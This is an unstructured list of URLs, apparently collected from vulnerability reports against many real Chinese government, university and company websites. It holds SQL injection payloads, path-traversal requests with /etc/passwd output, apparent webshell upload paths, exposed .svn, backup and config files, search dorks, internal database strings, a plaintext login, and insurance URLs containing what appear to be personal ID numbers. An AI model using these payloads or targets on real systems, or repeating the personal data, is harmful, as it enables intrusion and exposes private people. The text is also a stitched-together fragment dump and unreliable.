http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=dGVzdEBjaXRzLmNvbS5jbg==&userType=ZW1haWw=&submitType=emailResetpws http://www.cits.cn/member/getbackpasswd.html?sendTime=MjAxNS0wNC0wNyAxMjozOQ==&userValue=MjM1NDE5MDAxNEBxcS5jb20=&userType=ZW1haWw=&submitType=emailResetpws http://www.cits.cn/regist.html?sessionID=&sendTime=MjAxNS0wNC0wNyAxMjo1Ng==&email=d29veXVuQGNpdHMuY24=&password=Y2VzaGkxMjM=&mode=emailUser http://202.102.116.145/gyspt/framework/login!logout.action http://kaku.51credit.com/tag/index.html http://jwxt.tzpc.edu.cn/default.asp http://jwgl.jhu.cn/default.asp http://222.187.199.60/default.asp http://jwc.jljtxy.com.cn/default.asp http://211.70.120.101/default.asp http://jcjx.nuaa.edu.cn/kaoshi/ http://221.226.83.60:8081/default.asp http://61.133.99.99/admin/login.php http://ecp.weaver.com.cn/user/user!login.action http://ecp.weaver.com.cn/wechatapi.war http://ecp.weaver.com.cn/wechatapi/.svn/entries http://ecp.weaver.com.cn/12345.txt http://ecp.weaver.com.cn/12345.jsp http://ecp.weaver.com.cn/job.jsp http://ecp.weaver.com.cn/mytesttest.jsp http://ecp.weaver.com.cn/shell.jsp http://pm.51iwifi.com http://admin.mori.ifeng.com/Home/Index title:PHPEMS无纸化模拟考试系统 http://pr.alexa.cn/index.php?url=t.cc%20%27%20and%20extractvalue%281,%20concat%280x5c,%20%28select%20@@version%29%29%29%20or%20%27a%27=%27a http://union.ucweb.com/manager.php?m=Member&c=Account&a=login http://114.0437.com/xiaoxie/content/content.php?id=1121%20and%20sleep%2810%29 http://www.baoxian.com/console/shop/order_config_new!linkOrderDetails.action?orderSn=20140000000001 http://www.1337day.com/exploit/23480 http://mdl.shsmu.edu.cn/zh/home.jsp http://paper.medlive.cn/ http://paper.medlive.cn/literature/3957 http://paper.medlive.cn/literature/edit/3957 http://**.**.**/ http://sie.cuc.edu.cn/showleftenglish.php?ID=131 http://dzh.com.cn/admin/userlist.php 
http://dzh.com.cn/admin/editUser.php?username=test110%27%20and%201=2%20union%20select%201,username,3,password,5%20from%20user%20where%20username=%27admin%27--+ http://mo.gw.com.cn/解析的,后面可能因为修补“漏洞”后面换地方了。 https://github.com/qzn928/azurebreeze/blob/524389a30f2166a0a41df8c13dd1849166b4387f/azurebreeze/center/view/ssh_view.py https://github.com/qzn928/treasureBox/blob/ce08feddfc939191013757fa59000ba56f9a11d5/api.out https://github.com/qzn928/treasureBox/blob/a0ab816f8e407841a0a010f5f32b91218c82ea74/diskcheck.py https://github.com/qzn928/pay_mailer/blob/ca8be007415e5d09d3de03ecf26259f741056192/pay_mailer/local_settings.py http://home.bokecc.com http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2801014476254&id=53010219880612372x&ctype=01&md5sign=d6fa35ead16f0493c1c1ab3a525dd418 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2807111974873&id=422626196302170229&ctype=01&md5sign=7e8067e0ae6f83d074427c0fc0b9314b http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2816015503400&id=533525197612081220&ctype=01&md5sign=6a6a7fa5ce640aa197150e51e78ab4b3 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=2816014194518&ctype=01&md5sign=b17dc783a45e282c0fe9786a9140db0f&md5s=123 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=28040117881379&id=441900200603030873&ctype=01&md5sign=77c86b5898cea35bfee4a5e682e9a754 http://csm.taikang.com/ec/csm/query/policynew.jsp?policyno=28010111649884&id=220802198111191828&ctype=01&md5sign=e243cc5fd2f50dd5363dd19b12359423 http://42.99.33.26/MSS-PORTAL/ http://42.99.33.26/MSS-PORTAL/news/edit.do?id=20019 http://42.99.33.26/MSS-PORTAL/clearifynotice/edit.do?id=9200 http://xue.kekenet.com/index.php/search.html?word=1 http://tvoa.ijntv.cn:8057/hrss/login.jsp http://tvoa.ijntv.cn:8057/hrss/dorado/smartweb2.RPC.d?__rpc=true www.gnhz.sdu.edu.cn/about.php?id=7 http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd 
http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd_act http://localhost/test/iwebshop/index.php?controller=system&action=admin_repwd http://222.73.219.188:302/yydt/yydt-detel.asp?newsid=1261&leibieid=1 http://www.hkcts.com/CMS/news/search.action?ftl=/../../web.xml&catId=&keyword=3 https://ibsbjstar.ccb.com.cn/app/V5/CN/STY1/F100701.jsp?UKEYSERIALNUM= http://117.25.128.177:60010/data_report/login.do http://class.medlive.cn/ http://www.ydcard.com http://news.medlive.cn/all/info-news/show-76742_97.html http://www.globaltraveler.com.cn/存在数据库泄漏,可获取管理员密码。 http://www.jxdz.uestc.edu.cn/index.php/admin http://www.jdwy.zhaoyuan.gov.cn/admin/uploadfile.asp http://61.154.14.93:8080 http://61.154.14.93:8080/FCKeditor/editor/fckeditor.html http://61.154.14.93:8080/userfiles/file/33.asp http://219.235.86.81:8080/ http://www.tyut.edu.cn/gongqingtuan/news/info_show.asp?id=107&bigid=3&smallid=11 http://xm.bjnw.gov.cn/jmx-console/ http://english.sino-agri.com/show.php?id=10 http://www.fmyh.com.cn/shownews.asp?id=572 http://www.fmyh.com.cn/admin/ http://www.xmbtn.com/pay/index.html http://www.gzkyz.com.cn/MessageWrite.asp http://web.sh.ptt.189.cn/company/webapps/pages/ shell:http://web.sh.ptt.189.cn/company/webapps/pages/img.jsp http://info.xinhua.org/pubdkh/HNNY/login.htm http://map.srcb.com:8055/srcbGisPort/district/districtJson.do www.isunwifi.com http://www.isunwifi.com:81 http://m.zol.com.cn//topic/mwc/ajax/more.php?id=3083&page=2 http://117.27.135.247/login.aspx www.ordosgajj.gov.cn/index.aspx http://www.ordosgajj.gov.cn/news_details.aspx?ID=2153 http://www.ordosgajj.gov.cn/news_details.aspx?ID http://sqlmap.org http://pms.suning.com.cn/ http://www.letvcloud.com/stats/userinfo?userid=101111 http://**.**.**/main.aspx http://www.ed12345.com/product_detail.php?id=565 http://www.ed12345.com/news_list.php?class_id=50 http://www.ed12345.com/home.php?id=203 http://www.ed12345.com/product_detail2.php?member_id=203&id=629 
http://newlds-test.h3c.com/lds/sys_login.do http://cscrm.obc.tcl.com/DHome/Login.aspx http://www.citytalk.tw/bbs/forum.php?mod=viewthread&tid=52824&pid=1932775&page=1&extra=#pid1932775 http://express.4px.com/article/category/id/2/cid/13 http://eas.wyn88.com:6888/easweb/page/purOrder/branch/orderDetail.jsp?ponum=v01PO041120 http://topic.pptv.com http://cp.pptv.com jyfzzx.zjedu.org/admin/login.php http://www.evolution.ynu.edu.cn/web.rar http://www.evolution.ynu.edu.cn/gly_mag/index.aspx http://www.ieg.ynu.edu.cn/admin/ http://www.ieg.ynu.edu.cn/database/ http://www.ieg.ynu.edu.cn/db/ http://222.19.211.112/database/ http://www.ieg.ynu.edu.cn/edit/db/ http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15 http://fd.nenu.edu.cn/dede/index.php http://eblog.nenu.edu.cn http://office.nenu.edu.cn http://xxbs.nenu.edu.cn http://zcyjs.nenu.edu.cn http://fd.nenu.edu.cn http://efly.nenu.edu.cn http://office.nenu.edu.cn/ywbd/show.asp?id=381 http://sj.nenu.edu.cn/shenji/showgege.php?attid=41 http://chem.nenu.edu.cn/show_news.php?id=616&typeid=14 http://chinese.nenu.edu.cn/show_news.php?id=1053&typeid=15 http://subsite.nenu.edu.cn/qnn/questionresult.php?cs=8274 http://en.nenu.edu.cn/search.php http://www.phy.nenu.edu.cn/tu.php?class1=134 http://jjw.nenu.edu.cn/show.asp?id= http://postdoctor.nenu.edu.cn/sub/top.php?lk=jj&long=800 http://overseas.nenu.edu.cn/sub/top.php?lk=gplxzn&tag=26&long=500&PHPSESSID=vtvues5i8njkg0udcr99rafe81 http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://qzzby.cnta.gov.cn/privilege.php?act=login 
http://qzzby.cnta.gov.cn/visa.php?act=list http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://pinyin.sogou.com/dict/search/search_list/aa/normal http://pinyin.sogou.com/dict/search/search_list/aa/bb/normal http://training.hnteacher.net/ProjectPortal/index.aspx?id=149 http://home.hnteacher.net/Login.aspx http://demo2.74cms.com/ user:18600999295 pass:testlog http://www.inins.com/Policy/Insure/ConfirmPolicy/10000?type=Insure&group=0 http://www.inins.com/Policy/Insure/ConfirmPolicy/89736?type=Insure&group=0 http://allthingshair.youku.com/api/index.ph http://allthingshair.youku.com/api/index.ph http://ziyuan.eol.cn/list.php?listid=122 http://gnss.pku.edu.cn/www.rar http://gnss.pku.edu.cn/beif2011/admin.php http://123.232.106.72/.svn/entries http://www.caphbook.com/YH/BookList.aspx?con=000000070004 http://www.yz-news.com/jyycj/ http://www.yz-news.com/jyycj/admin/login.asp www.high-hope.com江苏汇鸿国际集团 http://221.226.187.26:1818/phpmyadmin http://221.226.187.26:1818/phpinfo.php泄漏了网站的绝对路径 http://218.78.241.80/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://oa.w12z.com/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.hjsyy.com http://www.hjsyy.com/product.asp?BigClassName=%D2%BD%BC%BC%BF%C6%CA%D2 http://mail.deluxworld.com 
http://www.dgrb.cn/searchprocess.aspx http://www.szfcsc.com/web/PubInfo/MoreQY.asp?Qryqymc=%CB%E6%D6%DD%CA%D0%BD%F0%BF%C6%B7%BF%B5%D8%B2%FA%BF%AA%B7%A2%D3%D0%CF http://www.hsfdc.com/web/Pubinfo/MoreQY.asp?Qryqymc=%BB%C6%CA%AF%B0%C2%C9%BD%D6%C3%D2%B5%D3%D0%CF%DE%B9%AB%CB%BE http://www.xysfdc.com/web/PubInfo/MoreQY.asp?Qryqymc=%C2%C0%C1%BA%BD%F5%B6%AB%B7%BF%B5%D8%B2%FA%BF%AA%B7%A2%D3%D0%CF%DE http://www.wjfdc.gov.cn:81/web/PubInfo/MoreQY.asp?Qryqymc=%B0%B2%C7%EC%CA%D0%CF%C8%B7%E6%D7%A1%D5%AC%BF%AA%B7%A2%D3%D0%CF http://oa.sxpmg.com/defaultroot/login.jsp http://lib.zjtvu.edu.cn/ http://lib.zjtvu.edu.cn/Notice.asp?ID=161 http://223.223.203.249:8088/ http://jiaju.loupan.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2 http://www.js-lottery.com/ http://115.236.21.51:8090/loginAction.action http://**.**.**/yjrc/person/ResumAction.doformAction=in&objName=AWorkInfo&operType=update&id=****** http://blog.kdnet.net/boke.asp?id5815402.html http://www.wwlzwjw.com/admin_student_dy_qq.asp?page=1 http://www.hljrcpj.com/company/Login.aspx http://www.hljrcpj.com/company/dayin.aspx?jid=03970020020011 http://www.hljrcpj.com/SY_List.aspx?A_T_ID=001.04 http://www.cgrs.cn/content/cpzx/2011-03-25/366.htm) http://kehuduan.fanxing.com//commerce.php/commerceManage/login https://wiki.changba.com http://wwwdemo.wandafilm.com/ http://wwwdemo.wandafilm.com/wanda/findMyInnerMsg.do?m=findMsgList HTTP://xss.hacktask.net/*******1428052014 http://www.nlrkjsw.gov.cn/cs http://www.goldenhotel.com.cn http://ag.cnnice.com/ncqs/choosemateriallist.do http://zfb.wywk.cn/admin/index#shopList zfb.wywk.cn/admin/GetRechargeInfoByTransactionid?id=2014112700001000210040275344 http://58.216.140.92/waoscz/log.txt http://58.216.140.92/waoscz/sql.aspx?cz=1 http://222.186.93.101/ycapp/login.action http://www.zjna.gov.cn/ycapp/login.action http://en.zjna.gov.cn/ycapp/depAdmin/doLogin.action http://183.203.18.25/newtl/show/Message!gcMessage3G.action http://www.zjkh.bj.cn/stage.action 
demo:http://www.zjkh.bj.cn/demo.txt demo:http://58.210.170.254/1.jsp http://zjemis.gov.cn:8080/jsp/reportingType/templateDownload_download.action http://zjemis.gov.cn:8080/wooyun.jsp http://www.hntsw.gov.cn/select_result.jsp http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp http://work.zbintel.com/manager/setsql.asp http://shgl.zhengzhou.gov.cn/zcms/zcms/index.html http://shgl.zhengzhou.gov.cn/zcms/zcms/html/2014-02-23/814e69ad5968042633665316.html http://shgl.zhengzhou.gov.cn/zcms/wooyun.jsp http://iot.cwebport.com/1.jsp http://www.fjgkxx.gov.cn http://219.137.44.21:9000/psjc/swc/reported/main.action http://note.liba.com filetype:xls http://218.65.107.173/%28vjujwh45yqqckiueahvxjo45%29//ggsm.aspx?fbsj=2014-06-16%2016:18:55&yxqx=2014-09-23&xh=1 http://application.lishui.gov.cn/AppPlatForm/admin http://182.92.239.209/manage/index.php http://182.92.239.209/manage/upload/tupian/2015/1428484340_536273.php inurl:cpzs.asp?ProClass= http://www.njhpzkb.com/manage/modfypwd.asp http://tfyibiao.com/manage/modfypwd.asp http://www.jsdjtzfz.com/manage/modfypwd.asp http://njxiangyu.com/manage/modfypwd.asp http://www.njrhlqkj.com/manage/modfypwd.asp http://tieba.baidu.com/p/3674865898 http://mcrm.cpic.com.cn/crmweb/addpeople/html5/login.html http://mcrm.cpic.com.cn/crmweb/addpeople/html5/ http://mcrm.cpic.com.cn/crmweb/addpeople/html5/success-inquire.html?empno= http://www.henancatv.com http://223.223.176.56:8080/background/Main/login.action demo:http://223.223.176.56:8080/1.jsp http://*******/Udw3Gi index.php/admin/main/login http://hd.liba.com http://test1.www.51zfx.net/newadmin/Distributor/Login.aspx http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=2015-04-08'+and+1=@@version--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2= 
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=db_name%28%29--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22 http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=user--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22 http://pl.zhibo8.cc/config.inc.php.bak zpjiaoyi.com/bbs/uc_server& inurl:list.aspx?columntag= http://www.jzxdzjc.gov.cn/portal/dzjc/jsjy/list.aspx?columnTag=%27zcfg%27 http://119.178.103.6:81/portal/dzjc/jsjy/list.aspx?columnTag='tzgg http://221.193.244.207:82/portal/dzjc/jsjy/list.aspx?columnTag=%27zcfg%27 http://121.18.36.138:90/anxin/website/list.aspx?columntag=tscy http://211.142.37.152:90/portal/dzjc/jsjy/list.aspx?columnTag='dzjc_jxtb http://mpay.hexun.com/RemitInfo.aspx?V_addinfo_product_name=%B8%F6%C8%CB%D5%CB%BB%A7%B3%E4%D6%B5&Order_sn=20150316000108 http://www.verymall.cn/member.php?action=order rdp://58.68.236.167:3389 http://tv.weipai.cn/phpinfo.php http://mobile.weipai.cn/?src=http%3A%2F%2Fwww.baidu.com%2F%3F1428487795.81&host=www.weipai.cn http://www.hrbcdc.com/admin/ http://api.m.renren.com/api http://www.m6go.com/my/myAddressList.do http://www.dzqh.com.cn/about_us.do http://baike.baidu.com/link?url=dQRxI2MgHaFQIgmsaKi8qdtxjBlF83dPcr7JsJjR71sFWto2kgAB8WwbILGprNSMumxJg0El5UpzEouTYrmYLq http://api.m.renren.com/api http://www.xiangshe.com/my/Address.do http://enterprise.zte.com.cn/jbossws13/ http://218.78.241.80/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://jmzx.xmedu.cn:9999/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.gxbyzx.cn:88/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://oa.w12z.com/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.xwgjzx.com:8888/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.bicesoft.com/ProductCase.html http://show.bicesoft.com/Apps/vote/Login.aspx http://diaocha.gd315.gov.cn/ http://vote.zbjw.gov.cn/ http://tousu.zbjw.gov.cn/ http://test1.xxls.gov.cn/ 
http://116.236.237.146/ http://fqxx.szftedu.cn:83/vote/default.htm http://dc.bjpop.gov.cn/vote/default.htm http://vote.cnhan.com/ http://vote.fdxjy.com/ http://survey.bjcsf.com/ http://www.gzszjgdj.gov.cn:8080/ http://show.bicesoft.com/Apps/vote/ http://vote.cnhan.com/login.aspx http://wooyun.org/bugs/wooyun-2010-0101477 www.tudou.com/programs/view/wmQHmEEyM4E/ http://58lohas.com.cn/Admin/Login/index.html http://yjmw.cn http://218.78.241.80/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://jmzx.xmedu.cn:9999/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://www.gxbyzx.cn:88/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://oa.w12z.com/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://www.xwgjzx.com:8888/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 inurl:web/index.php site:gov.cn http://www.fyjc.gov.cn/web/index.php?module=information08&act=list&category_id=259 http://www.xybb.gov.cn/web/index.php?module=documents02&category_id=116 http://www.xydpc.gov.cn/web/index.php?module=vote&act=list&category_id=82 http://www.xyit.gov.cn/web/index.php?module=information09&act=list&category_id=136 http://www.fyjc.gov.cn/web/index.php?module=information08&act=list&category_id=259 http://www.xygl.org/web/index.php?module=download&category_id=78 http://old.xyaic.gov.cn/web/index.php?module=information01&category_id=60 http://www.xyga.gov.cn/web/index.php?module=information05&act=list&category_id=61 http://xnh.xybb.gov.cn/web/index.php?module=information03&category_id=46 http://www.xyipo.gov.cn/web/index.php?module=information05&act=list&category_id=153 http://www.xybb.gov.cn/web/index.php?module=information20&act=list&category_id=215 http://www.xycg.gov.cn/web/index.php?module=information01&category_id=123 http://www.xyfazhi.gov.cn/web/index.php/module-information-category_id-213.htm http://www.jxxyfda.gov.cn/web/index.php?module=information14&act=list&category_id=155 
http://www.xysports.gov.cn/web/index.php?module=policy&category_id=10 http://www.xycg.gov.cn/web/index.php?module=information02&category_id=137 http://www.xygzw.gov.cn/web/index.php?module=documents&act=list&category_id=61 http://www.xyxfj.gov.cn/web/index.php?module=information01&category_id=106 http://www.xywqb.gov.cn/web/index.php?module=information01&category_id=202 http://www.yoloho.com/done http://wap.zhuqu.com/people/375223/folder http://116.213.178.81/data/config.php_bak http://brandbase.mama.cn/friso.php?cityid=1&forumid=127&mod=activity https://accounts.grandcloud.cn http://www.huway.com/user_jyxq?from=actorder&orderid=%s http://hbcdc.cn/index.php/common-vote.html?id=1 http://www.chinalife.com.cn/jobs/module/outresumePrint/outprintPreview.do?applylogininfoIds=10000&selectedProjectId=&applyType=1 http://www.chinalife.com.cn/jobs/module/outresumePrint/outprintPreview.do?applylogininfoIds=278011&selectedProjectId=&applyType=1 http://rszp.gdufs.edu.cn/zpsys/apps/jsp/getXmlFromdata.jsp inurl:/Web_Site/tsjy.aspx?lmid= http://www.xgfdc.com.cn/Web_Site/tsjy.aspx?lmid=201 http://www.thfdc.gov.cn/Web_Site/tsjy.aspx?lmid=201 http://www.yxfgs.net/Web_Site/tsjy.aspx?lmid=201 http://www.hsxfdc.com/Web_Site/tsjy.aspx?lmid=201 http://www.ljfc.gov.cn/Web_Site/tsjy.aspx?lmid=201 http://www.hr.gdtel.com.cn/resumeAction_exportResume.html?regId=3000001 http://www.hr.gdtel.com.cn/resumeAction_exportResume.html?regId=3064929 url:http://211.95.193.95/orderAccept/manager/admin_index.jsp http://youwu.jiemian.com/Admin http://www.hntsw.gov.cn/select_result.jsp http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp http://i.yixin.com/ http://i.yixin.com/,来到重置密码的地方,输入邮箱账号,点击下一步 http://i.byd.com.cn/config/config.rar URL:http://i.byd.com.cn/config/testdatacenter.rar http://www.966599.com/ http://edu.966599.com/lds/sys_toLogin.do http://www.hntsw.gov.cn/select_result.jsp 
http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp yw.zjedu.org/common/key_xxgl.php http://jifen.fumu.com/flow.php?step=update_cart http://*****8 http://xf.gdwst.gov.cn/letter/writeletter.jsp?xlbox=5 http://localhost/cgi-bin/test-cgi http://beian.ncfdj.gov.cn:8080/buildInfo.aspx?certno=20150093 http://222.135.76.130/buildInfo.aspx?certno=SD10117 http://www.jlxfdc.com:8308/buildInfo.aspx?certno=20130004 http://www.jxanyifg.com/webbargain/buildInfo.aspx?certno=2013-011 http://58.59.112.106/buildInfo.aspx?certno=%E6%83%A0%E6%88%BF%E9%A2%84%E5%AD%97%E7%AC%AC2010-04%E5%8F%B7 http://www.ychfgj.com/ba/buildInfo.aspx?certno=201211 http://www.bxfgj.gov.cn/webbargainbx/buildInfo.aspx?certno=20080053 http://www.lysfgj.com:81/buildInfo.aspx?certno=201013 http://www.bzfcj.gov.cn:9090/buildInfo.aspx?certno=201207007 http://121.26.200.28:8080/buildInfo.aspx?certno=2014043 http://www.jxanyifg.com/webbargain/buildInfo.aspx?certno=2013-011 http://202.206.64.221:8080/gmis/login.aspx http://login.360.cn/intf.php?method=UserIntf.login&des=1&is_keep_alive=0&from=360cloud_mobile&fields=qid&v=1.2.2¶m={0}&format=json&sig={1 www.iyunmai.com然后马上得到了域名信息 http://www.nbsz.gov.cn http://wwwdemo.wandafilm.com http://wooyun.org/bugs/wooyun-2015-0106596)这个案例提过该测试主站的数据是同步的,故问题归结于测试站点和生产站点未做隔离导致相应的漏洞升级。 http://wwwdemo.wandafilm.com/trade/coupons.do?m=useExachangeStage&sid=0.14484114106744528 http://wwwdemo.wandafilm.com http://www.cqczkj.gov.cn:8081/jobfan/2010.jsp jdbc:oracle:thin:@172.23.121.2:1521:ufgov http://www.teda.gov.cn/tedaweb/default.aspx http://bm.ahkj.gov.cn:8080/ahkj/common/eWebEditor/admin/default.jsp http://bm.ahkj.gov.cn:8080/ahkj/common/eWebEditor/uploadfile/2010.jsp jdbc:oracle:thin:@10.20.150.97:1521:faimapp http://219.232.200.39/uamsso/。选择口令方式登陆 http://psy.ruc.edu.cn/newsinfo.php?id=-3322 http://psy.ruc.edu.cn/activityinfo.php?id=8 http://psy.ruc.edu.cn/faculty.php?sortid=3 
http://psy.ruc.edu.cn/newsinfo.php?id=34 http://www.zhuanligo.cn/sort_list.php?sort_id=6 http://m.damai.cn/login.aspx?from=userinfo.aspx http://113.31.22.137:20202/admin.php http://113.31.22.137:20200/root/ http://www.itrust.org.cn/ URL:http://www.chinaamc.com/portal/cn/second_login.jsp?categoty_link=../../WEB-INF/web.xml%3f&column=1246275754100&link_page=http://www.chinaamc.com/portal/cn/second.jsp&minisite_column=1208583703100 www.110122.cn/portal/HomePage!newsDetail.doID=151596_ http://www.110122.cn/***** http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf www.pomelo.com/ www.52hxw.com/ www.posterlabs.cn/ http://auth.seeyouyima.com/.svn/entries http://www.seeyouyima.com//.svn/entries http://www.seeyouyima.com/update_admin/login.php www.baozouwushuang.com http://www.flcit.com/index.do POST:/dms/pwdup!chkFolderPwd.do Data:pickbtn=%E6%8F%90%E4%BA%A4%E9%AA%8C%E8%AF%81&supply=aa&uploadPwd=a http://www.tayz.cn/dms/pwdup!chkFolderPwd.do http://www.xmkjzx.com/dms/pwdup!chkFolderPwd.do http://www.xmblxx.com/dms/pwdup!chkFolderPwd.do http://jydd.xmhcedu.gov.cn/dms/pwdup!chkFolderPwd.do http://www.xmxayz.com/dms/pwdup!chkFolderPwd.do http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx 
http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx www.gsgajt.gov.cn/)_ gsgajt.gov.cn/WEBCGS/Search.aspxTitle=1111_ http://gs***** http://218.245.4.39/front/login!logout.do http://chanye.focus.cn/chanye_rentsale/user_center.php?operation_type=2&page=1&rentsale=-1 http://wooyun.org/bugs/wooyun-2013-046868 http://helpdesk.sunits.com/hd/login!findPass.do http://helpdesk.sunits.com/hd/1.txt http://www.wom186.com http://fwwbqy.fwmys.mofcom.gov.cn/ http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00&sp=S http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00'&sp=S ext:/usr/java/packages/lib/ext http://union.fhyx.com/index.php http://wap.caitiyu.com/pages/weixin/hmdt/.svn/entries http://wap.caitiyu.com/pages/weixin/help/.svn/entries http://wap.caitiyu.com/pages/weixin/jingcai/.svn/entries http://wap.caitiyu.com/pages/weixin/.svn/entries http://wap.caitiyu.com/pages/weixin/JcSingle/.svn/entries http://bug.caitiyu.com/?mode=phpinfo http://218.78.241.80/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://oa.w12z.com/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://www.xwgjzx.com:8888/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://202.118.31.223:801/sbweb/Userlogin.asp?uid=%E6%B5%91%E5%8D%97%E6%A0%A1%E5%8C%BA%E7%AE%A1%E7%90%86%E5%A7%94%E5%91%98%E4%BC%9A&pwd=123 http://218.78.241.80/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://oa.w12z.com/anmai/SF_Manage/tfdeleN.aspx?tfid=1 
http://www.xwgjzx.com:8888/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://**.**.**/ http://**.**.**/www.rar http://218.29.219.68/area/customer.asp,页面有个搜索: http://da.linyi.gov.cn/view.asp?id=324 http://da.linyi.gov.cn/newadmin/login.asp http://www.xxs.la/TWWsZt http://www.gyqx.gov.cn/manage.asp http://mail.126.com/js6/h/flashRequest.swf http://www.mingjian.com/moban_show.php?c http://113.132.128.83/.svn/entries http://113.132.128.83:8080/.svn/entries http://113.132.128.83:9001/.svn/entries http://113.132.128.83:8008/.svn/entries http://113.132.128.83:8007/.svn/entries http://113.132.128.83:9006/.svn/entries http://m.myctu.cn/.svn/entries http://www.redocn.com/company.php?uid=3175546&do=case&op=viewalbum&albumid=290174 http://218.78.241.80/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://oa.w12z.com/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://www.xwgjzx.com:8888/anmai/SF_Manage/tfallremove.aspx?tfid=1 